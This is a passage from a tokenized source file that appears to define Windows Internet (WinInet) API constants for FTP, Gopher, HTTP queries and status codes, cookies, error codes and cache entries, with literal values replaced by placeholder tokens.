<NUM_LIT> <EOL> FTP_TRANSFER_TYPE_UNKNOWN = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_ASCII = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_BINARY = <NUM_LIT> <EOL> FTP_TRANSFER_TYPE_MASK = ( FTP_TRANSFER_TYPE_ASCII | FTP_TRANSFER_TYPE_BINARY ) <EOL> MAX_GOPHER_DISPLAY_TEXT = <NUM_LIT> <EOL> MAX_GOPHER_SELECTOR_TEXT = <NUM_LIT> <EOL> MAX_GOPHER_HOST_NAME = INTERNET_MAX_HOST_NAME_LENGTH <EOL> MAX_GOPHER_LOCATOR_LENGTH = ( <NUM_LIT:1> + MAX_GOPHER_DISPLAY_TEXT + <NUM_LIT:1> + MAX_GOPHER_SELECTOR_TEXT + <NUM_LIT:1> + MAX_GOPHER_HOST_NAME + <NUM_LIT:1> + INTERNET_MAX_PORT_NUMBER_LENGTH + <NUM_LIT:1> + <NUM_LIT:1> + <NUM_LIT:2> ) <EOL> GOPHER_TYPE_TEXT_FILE = <NUM_LIT> <EOL> GOPHER_TYPE_DIRECTORY = <NUM_LIT> <EOL> GOPHER_TYPE_CSO = <NUM_LIT> <EOL> GOPHER_TYPE_ERROR = <NUM_LIT> <EOL> GOPHER_TYPE_MAC_BINHEX = <NUM_LIT> <EOL> GOPHER_TYPE_DOS_ARCHIVE = <NUM_LIT> <EOL> GOPHER_TYPE_UNIX_UUENCODED = <NUM_LIT> <EOL> GOPHER_TYPE_INDEX_SERVER = <NUM_LIT> <EOL> GOPHER_TYPE_TELNET = <NUM_LIT> <EOL> GOPHER_TYPE_BINARY = <NUM_LIT> <EOL> GOPHER_TYPE_REDUNDANT = <NUM_LIT> <EOL> GOPHER_TYPE_TN3270 = <NUM_LIT> <EOL> GOPHER_TYPE_GIF = <NUM_LIT> <EOL> GOPHER_TYPE_IMAGE = <NUM_LIT> <EOL> GOPHER_TYPE_BITMAP = <NUM_LIT> <EOL> GOPHER_TYPE_MOVIE = <NUM_LIT> <EOL> GOPHER_TYPE_SOUND = <NUM_LIT> <EOL> GOPHER_TYPE_HTML = <NUM_LIT> <EOL> GOPHER_TYPE_PDF = <NUM_LIT> <EOL> GOPHER_TYPE_CALENDAR = <NUM_LIT> <EOL> GOPHER_TYPE_INLINE = <NUM_LIT> <EOL> GOPHER_TYPE_UNKNOWN = <NUM_LIT> <EOL> GOPHER_TYPE_ASK = <NUM_LIT> <EOL> GOPHER_TYPE_GOPHER_PLUS = ( - <NUM_LIT> ) <EOL> GOPHER_TYPE_FILE_MASK = ( GOPHER_TYPE_TEXT_FILE | GOPHER_TYPE_MAC_BINHEX | GOPHER_TYPE_DOS_ARCHIVE | GOPHER_TYPE_UNIX_UUENCODED | GOPHER_TYPE_BINARY | GOPHER_TYPE_GIF | GOPHER_TYPE_IMAGE | GOPHER_TYPE_BITMAP | GOPHER_TYPE_MOVIE | GOPHER_TYPE_SOUND | GOPHER_TYPE_HTML | GOPHER_TYPE_PDF | GOPHER_TYPE_CALENDAR | GOPHER_TYPE_INLINE ) <EOL> MAX_GOPHER_CATEGORY_NAME = <NUM_LIT> <EOL> MAX_GOPHER_ATTRIBUTE_NAME = <NUM_LIT> <EOL> MIN_GOPHER_ATTRIBUTE_LENGTH = <NUM_LIT> 
<EOL> GOPHER_ATTRIBUTE_ID_BASE = ( - <NUM_LIT> ) <EOL> GOPHER_CATEGORY_ID_ALL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:1> ) <EOL> GOPHER_CATEGORY_ID_INFO = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:2> ) <EOL> GOPHER_CATEGORY_ID_ADMIN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:3> ) <EOL> GOPHER_CATEGORY_ID_VIEWS = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:4> ) <EOL> GOPHER_CATEGORY_ID_ABSTRACT = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:5> ) <EOL> GOPHER_CATEGORY_ID_VERONICA = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:6> ) <EOL> GOPHER_CATEGORY_ID_ASK = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:7> ) <EOL> GOPHER_CATEGORY_ID_UNKNOWN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:8> ) <EOL> GOPHER_ATTRIBUTE_ID_ALL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:9> ) <EOL> GOPHER_ATTRIBUTE_ID_ADMIN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:10> ) <EOL> GOPHER_ATTRIBUTE_ID_MOD_DATE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:11> ) <EOL> GOPHER_ATTRIBUTE_ID_TTL = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:12> ) <EOL> GOPHER_ATTRIBUTE_ID_SCORE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_RANGE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_SITE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:15> ) <EOL> GOPHER_ATTRIBUTE_ID_ORG = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:16> ) <EOL> GOPHER_ATTRIBUTE_ID_LOCATION = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_GEOG = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_TIMEZONE = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_PROVIDER = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT:20> ) <EOL> GOPHER_ATTRIBUTE_ID_VERSION = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_ABSTRACT = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_VIEW = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_TREEWALK = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> GOPHER_ATTRIBUTE_ID_UNKNOWN = ( GOPHER_ATTRIBUTE_ID_BASE + <NUM_LIT> ) <EOL> HTTP_MAJOR_VERSION = 
<NUM_LIT:1> <EOL> HTTP_MINOR_VERSION = <NUM_LIT:0> <EOL> HTTP_VERSIONA = "<STR_LIT>" <EOL> HTTP_VERSION = HTTP_VERSIONA <EOL> HTTP_QUERY_MIME_VERSION = <NUM_LIT:0> <EOL> HTTP_QUERY_CONTENT_TYPE = <NUM_LIT:1> <EOL> HTTP_QUERY_CONTENT_TRANSFER_ENCODING = <NUM_LIT:2> <EOL> HTTP_QUERY_CONTENT_ID = <NUM_LIT:3> <EOL> HTTP_QUERY_CONTENT_DESCRIPTION = <NUM_LIT:4> <EOL> HTTP_QUERY_CONTENT_LENGTH = <NUM_LIT:5> <EOL> HTTP_QUERY_CONTENT_LANGUAGE = <NUM_LIT:6> <EOL> HTTP_QUERY_ALLOW = <NUM_LIT:7> <EOL> HTTP_QUERY_PUBLIC = <NUM_LIT:8> <EOL> HTTP_QUERY_DATE = <NUM_LIT:9> <EOL> HTTP_QUERY_EXPIRES = <NUM_LIT:10> <EOL> HTTP_QUERY_LAST_MODIFIED = <NUM_LIT:11> <EOL> HTTP_QUERY_MESSAGE_ID = <NUM_LIT:12> <EOL> HTTP_QUERY_URI = <NUM_LIT> <EOL> HTTP_QUERY_DERIVED_FROM = <NUM_LIT> <EOL> HTTP_QUERY_COST = <NUM_LIT:15> <EOL> HTTP_QUERY_LINK = <NUM_LIT:16> <EOL> HTTP_QUERY_PRAGMA = <NUM_LIT> <EOL> HTTP_QUERY_VERSION = <NUM_LIT> <EOL> HTTP_QUERY_STATUS_CODE = <NUM_LIT> <EOL> HTTP_QUERY_STATUS_TEXT = <NUM_LIT:20> <EOL> HTTP_QUERY_RAW_HEADERS = <NUM_LIT> <EOL> HTTP_QUERY_RAW_HEADERS_CRLF = <NUM_LIT> <EOL> HTTP_QUERY_CONNECTION = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_CHARSET = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_LANGUAGE = <NUM_LIT> <EOL> HTTP_QUERY_AUTHORIZATION = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_FORWARDED = <NUM_LIT:30> <EOL> HTTP_QUERY_FROM = <NUM_LIT> <EOL> HTTP_QUERY_IF_MODIFIED_SINCE = <NUM_LIT:32> <EOL> HTTP_QUERY_LOCATION = <NUM_LIT> <EOL> HTTP_QUERY_ORIG_URI = <NUM_LIT> <EOL> HTTP_QUERY_REFERER = <NUM_LIT> <EOL> HTTP_QUERY_RETRY_AFTER = <NUM_LIT> <EOL> HTTP_QUERY_SERVER = <NUM_LIT> <EOL> HTTP_QUERY_TITLE = <NUM_LIT> <EOL> HTTP_QUERY_USER_AGENT = <NUM_LIT> <EOL> HTTP_QUERY_WWW_AUTHENTICATE = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_AUTHENTICATE = <NUM_LIT> <EOL> HTTP_QUERY_ACCEPT_RANGES = <NUM_LIT> <EOL> HTTP_QUERY_SET_COOKIE = <NUM_LIT> <EOL> HTTP_QUERY_COOKIE = <NUM_LIT> <EOL> 
HTTP_QUERY_REQUEST_METHOD = <NUM_LIT> <EOL> HTTP_QUERY_REFRESH = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_DISPOSITION = <NUM_LIT> <EOL> HTTP_QUERY_AGE = <NUM_LIT> <EOL> HTTP_QUERY_CACHE_CONTROL = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_BASE = <NUM_LIT:50> <EOL> HTTP_QUERY_CONTENT_LOCATION = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_MD5 = <NUM_LIT> <EOL> HTTP_QUERY_CONTENT_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_ETAG = <NUM_LIT> <EOL> HTTP_QUERY_HOST = <NUM_LIT> <EOL> HTTP_QUERY_IF_MATCH = <NUM_LIT> <EOL> HTTP_QUERY_IF_NONE_MATCH = <NUM_LIT> <EOL> HTTP_QUERY_IF_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_IF_UNMODIFIED_SINCE = <NUM_LIT> <EOL> HTTP_QUERY_MAX_FORWARDS = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_AUTHORIZATION = <NUM_LIT> <EOL> HTTP_QUERY_RANGE = <NUM_LIT> <EOL> HTTP_QUERY_TRANSFER_ENCODING = <NUM_LIT> <EOL> HTTP_QUERY_UPGRADE = <NUM_LIT:64> <EOL> HTTP_QUERY_VARY = <NUM_LIT> <EOL> HTTP_QUERY_VIA = <NUM_LIT> <EOL> HTTP_QUERY_WARNING = <NUM_LIT> <EOL> HTTP_QUERY_EXPECT = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_CONNECTION = <NUM_LIT> <EOL> HTTP_QUERY_UNLESS_MODIFIED_SINCE = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_REQUEST = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_REPLY = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_HEADERS = <NUM_LIT> <EOL> HTTP_QUERY_ECHO_HEADERS_CRLF = <NUM_LIT> <EOL> HTTP_QUERY_PROXY_SUPPORT = <NUM_LIT> <EOL> HTTP_QUERY_AUTHENTICATION_INFO = <NUM_LIT> <EOL> HTTP_QUERY_PASSPORT_URLS = <NUM_LIT> <EOL> HTTP_QUERY_PASSPORT_CONFIG = <NUM_LIT> <EOL> HTTP_QUERY_MAX = <NUM_LIT> <EOL> HTTP_QUERY_CUSTOM = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_REQUEST_HEADERS = ( - <NUM_LIT> ) <EOL> HTTP_QUERY_FLAG_SYSTEMTIME = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_NUMBER = <NUM_LIT> <EOL> HTTP_QUERY_FLAG_COALESCE = <NUM_LIT> <EOL> HTTP_QUERY_MODIFIER_FLAGS_MASK = ( HTTP_QUERY_FLAG_REQUEST_HEADERS | HTTP_QUERY_FLAG_SYSTEMTIME | HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_FLAG_COALESCE ) <EOL> HTTP_QUERY_HEADER_MASK = ( ~ HTTP_QUERY_MODIFIER_FLAGS_MASK ) <EOL> HTTP_STATUS_CONTINUE = <NUM_LIT:100> <EOL> HTTP_STATUS_SWITCH_PROTOCOLS = <NUM_LIT> <EOL> 
HTTP_STATUS_OK = <NUM_LIT:200> <EOL> HTTP_STATUS_CREATED = <NUM_LIT> <EOL> HTTP_STATUS_ACCEPTED = <NUM_LIT> <EOL> HTTP_STATUS_PARTIAL = <NUM_LIT> <EOL> HTTP_STATUS_NO_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_RESET_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_PARTIAL_CONTENT = <NUM_LIT> <EOL> HTTP_STATUS_AMBIGUOUS = <NUM_LIT> <EOL> HTTP_STATUS_MOVED = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT_METHOD = <NUM_LIT> <EOL> HTTP_STATUS_NOT_MODIFIED = <NUM_LIT> <EOL> HTTP_STATUS_USE_PROXY = <NUM_LIT> <EOL> HTTP_STATUS_REDIRECT_KEEP_VERB = <NUM_LIT> <EOL> HTTP_STATUS_BAD_REQUEST = <NUM_LIT> <EOL> HTTP_STATUS_DENIED = <NUM_LIT> <EOL> HTTP_STATUS_PAYMENT_REQ = <NUM_LIT> <EOL> HTTP_STATUS_FORBIDDEN = <NUM_LIT> <EOL> HTTP_STATUS_NOT_FOUND = <NUM_LIT> <EOL> HTTP_STATUS_BAD_METHOD = <NUM_LIT> <EOL> HTTP_STATUS_NONE_ACCEPTABLE = <NUM_LIT> <EOL> HTTP_STATUS_PROXY_AUTH_REQ = <NUM_LIT> <EOL> HTTP_STATUS_REQUEST_TIMEOUT = <NUM_LIT> <EOL> HTTP_STATUS_CONFLICT = <NUM_LIT> <EOL> HTTP_STATUS_GONE = <NUM_LIT> <EOL> HTTP_STATUS_LENGTH_REQUIRED = <NUM_LIT> <EOL> HTTP_STATUS_PRECOND_FAILED = <NUM_LIT> <EOL> HTTP_STATUS_REQUEST_TOO_LARGE = <NUM_LIT> <EOL> HTTP_STATUS_URI_TOO_LONG = <NUM_LIT> <EOL> HTTP_STATUS_UNSUPPORTED_MEDIA = <NUM_LIT> <EOL> HTTP_STATUS_RETRY_WITH = <NUM_LIT> <EOL> HTTP_STATUS_SERVER_ERROR = <NUM_LIT> <EOL> HTTP_STATUS_NOT_SUPPORTED = <NUM_LIT> <EOL> HTTP_STATUS_BAD_GATEWAY = <NUM_LIT> <EOL> HTTP_STATUS_SERVICE_UNAVAIL = <NUM_LIT> <EOL> HTTP_STATUS_GATEWAY_TIMEOUT = <NUM_LIT> <EOL> HTTP_STATUS_VERSION_NOT_SUP = <NUM_LIT> <EOL> HTTP_STATUS_FIRST = HTTP_STATUS_CONTINUE <EOL> HTTP_STATUS_LAST = HTTP_STATUS_VERSION_NOT_SUP <EOL> HTTP_ADDREQ_INDEX_MASK = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAGS_MASK = ( - <NUM_LIT> ) <EOL> HTTP_ADDREQ_FLAG_ADD_IF_NEW = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_ADD = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE_WITH_SEMICOLON = <NUM_LIT> <EOL> HTTP_ADDREQ_FLAG_COALESCE = 
HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA <EOL> HTTP_ADDREQ_FLAG_REPLACE = ( - <NUM_LIT> ) <EOL> HSR_ASYNC = WININET_API_FLAG_ASYNC <EOL> HSR_SYNC = WININET_API_FLAG_SYNC <EOL> HSR_USE_CONTEXT = WININET_API_FLAG_USE_CONTEXT <EOL> HSR_INITIATE = <NUM_LIT> <EOL> HSR_DOWNLOAD = <NUM_LIT> <EOL> HSR_CHUNKED = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_SECURE = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_SESSION = <NUM_LIT> <EOL> INTERNET_COOKIE_THIRD_PARTY = <NUM_LIT> <EOL> INTERNET_COOKIE_PROMPT_REQUIRED = <NUM_LIT> <EOL> INTERNET_COOKIE_EVALUATE_P3P = <NUM_LIT> <EOL> INTERNET_COOKIE_APPLY_P3P = <NUM_LIT> <EOL> INTERNET_COOKIE_P3P_ENABLED = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_RESTRICTED = <NUM_LIT> <EOL> INTERNET_COOKIE_IE6 = <NUM_LIT> <EOL> INTERNET_COOKIE_IS_LEGACY = <NUM_LIT> <EOL> FLAG_ICC_FORCE_CONNECTION = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FILTER_FOR_ERRORS = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_CHANGE_OPTIONS = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_GENERATE_DATA = <NUM_LIT> <EOL> FLAGS_ERROR_UI_FLAGS_NO_UI = <NUM_LIT> <EOL> FLAGS_ERROR_UI_SERIALIZE_DIALOGS = <NUM_LIT> <EOL> INTERNET_ERROR_BASE = <NUM_LIT> <EOL> ERROR_INTERNET_OUT_OF_HANDLES = ( INTERNET_ERROR_BASE + <NUM_LIT:1> ) <EOL> ERROR_INTERNET_TIMEOUT = ( INTERNET_ERROR_BASE + <NUM_LIT:2> ) <EOL> ERROR_INTERNET_EXTENDED_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT:3> ) <EOL> ERROR_INTERNET_INTERNAL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT:4> ) <EOL> ERROR_INTERNET_INVALID_URL = ( INTERNET_ERROR_BASE + <NUM_LIT:5> ) <EOL> ERROR_INTERNET_UNRECOGNIZED_SCHEME = ( INTERNET_ERROR_BASE + <NUM_LIT:6> ) <EOL> ERROR_INTERNET_NAME_NOT_RESOLVED = ( INTERNET_ERROR_BASE + <NUM_LIT:7> ) <EOL> ERROR_INTERNET_PROTOCOL_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT:8> ) <EOL> ERROR_INTERNET_INVALID_OPTION = ( INTERNET_ERROR_BASE + <NUM_LIT:9> ) <EOL> ERROR_INTERNET_BAD_OPTION_LENGTH = ( INTERNET_ERROR_BASE + <NUM_LIT:10> ) <EOL> ERROR_INTERNET_OPTION_NOT_SETTABLE = ( INTERNET_ERROR_BASE + <NUM_LIT:11> ) <EOL> ERROR_INTERNET_SHUTDOWN = ( 
INTERNET_ERROR_BASE + <NUM_LIT:12> ) <EOL> ERROR_INTERNET_INCORRECT_USER_NAME = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_PASSWORD = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_LOGIN_FAILURE = ( INTERNET_ERROR_BASE + <NUM_LIT:15> ) <EOL> ERROR_INTERNET_INVALID_OPERATION = ( INTERNET_ERROR_BASE + <NUM_LIT:16> ) <EOL> ERROR_INTERNET_OPERATION_CANCELLED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_HANDLE_TYPE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_HANDLE_STATE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NOT_PROXY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT:20> ) <EOL> ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_BAD_REGISTRY_PARAMETER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_DIRECT_ACCESS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_CONTEXT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NO_CALLBACK = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_REQUEST_PENDING = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INCORRECT_FORMAT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_ITEM_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CANNOT_CONNECT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CONNECTION_ABORTED = ( INTERNET_ERROR_BASE + <NUM_LIT:30> ) <EOL> ERROR_INTERNET_CONNECTION_RESET = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FORCE_RETRY = ( INTERNET_ERROR_BASE + <NUM_LIT:32> ) <EOL> ERROR_INTERNET_INVALID_PROXY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NEED_UI = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_HANDLE_EXISTS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_DATE_INVALID = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_CN_INVALID = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> 
ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_MIXED_SECURITY = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CHG_POST_IS_NON_SECURE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_POST_IS_NON_SECURE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INVALID_CA = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_ASYNC_THREAD_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_REDIRECT_SCHEME_CHANGE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_DIALOG_PENDING = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_RETRY_DIALOG = ( INTERNET_ERROR_BASE + <NUM_LIT:50> ) <EOL> ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_INSERT_CDROM = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FORTEZZA_LOGIN_NEEDED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_ERRORS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_NO_REV = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_REV_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_TRANSFER_IN_PROGRESS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_DROPPED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_FTP_NO_PASSIVE_MODE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_PROTOCOL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_NOT_FILE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_DATA_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_END_OF_DATA = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_INVALID_LOCATOR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_INCORRECT_LOCATOR_TYPE = 
( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_NOT_GOPHER_PLUS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_ATTRIBUTE_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_GOPHER_UNKNOWN_LOCATOR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_HEADER_NOT_FOUND = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_DOWNLEVEL_SERVER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_SERVER_RESPONSE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_HEADER = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_INVALID_QUERY_REQUEST = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_HEADER_ALREADY_EXISTS = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_REDIRECT_FAILED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_NOT_REDIRECTED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_COOKIE_NEEDS_CONFIRMATION = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_COOKIE_DECLINED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_HTTP_REDIRECT_NEEDS_CONFIRMATION = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SECURITY_CHANNEL_ERROR = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_UNABLE_TO_CACHE_FILE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_TCPIP_NOT_INSTALLED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_DISCONNECTED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SERVER_UNREACHABLE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_PROXY_SERVER_UNREACHABLE = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_BAD_AUTO_PROXY_SCRIPT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_UNABLE_TO_DOWNLOAD_SCRIPT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_INVALID_CERT = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_SEC_CERT_REVOKED = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_FAILED_DUETOSECURITYCHECK = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NOT_INITIALIZED = 
( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_NEED_MSN_SSPI_PKG = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> ERROR_INTERNET_LOGIN_FAILURE_DISPLAY_ENTITY_BODY = ( INTERNET_ERROR_BASE + <NUM_LIT> ) <EOL> INTERNET_ERROR_LAST = ERROR_INTERNET_LOGIN_FAILURE_DISPLAY_ENTITY_BODY <EOL> NORMAL_CACHE_ENTRY = <NUM_LIT> <EOL> STICKY_CACHE_ENTRY = <NUM_LIT> <EOL> EDITED_CACHE_ENTRY = <NUM_LIT> <EOL> TRACK_OFFLINE_CACHE_ENTRY = <NUM_LIT> <EOL> TRACK_ONLINE_CACHE_ENTRY = <NUM_LIT> <EOL> SPARSE_CACHE_ENTRY = <NUM_LIT> <EOL> COOKIE_CACHE_ENTRY = <NUM_LIT> <EOL> URLHISTORY_CACHE_ENTRY = <NUM_LIT> <EOL> URLCACHE_FIND_DEFAULT_FILTER = NORMAL_CACHE_ENTRY | COOKIE_CACHE_ENTRY | URLHISTORY_CACHE_ENTRY | 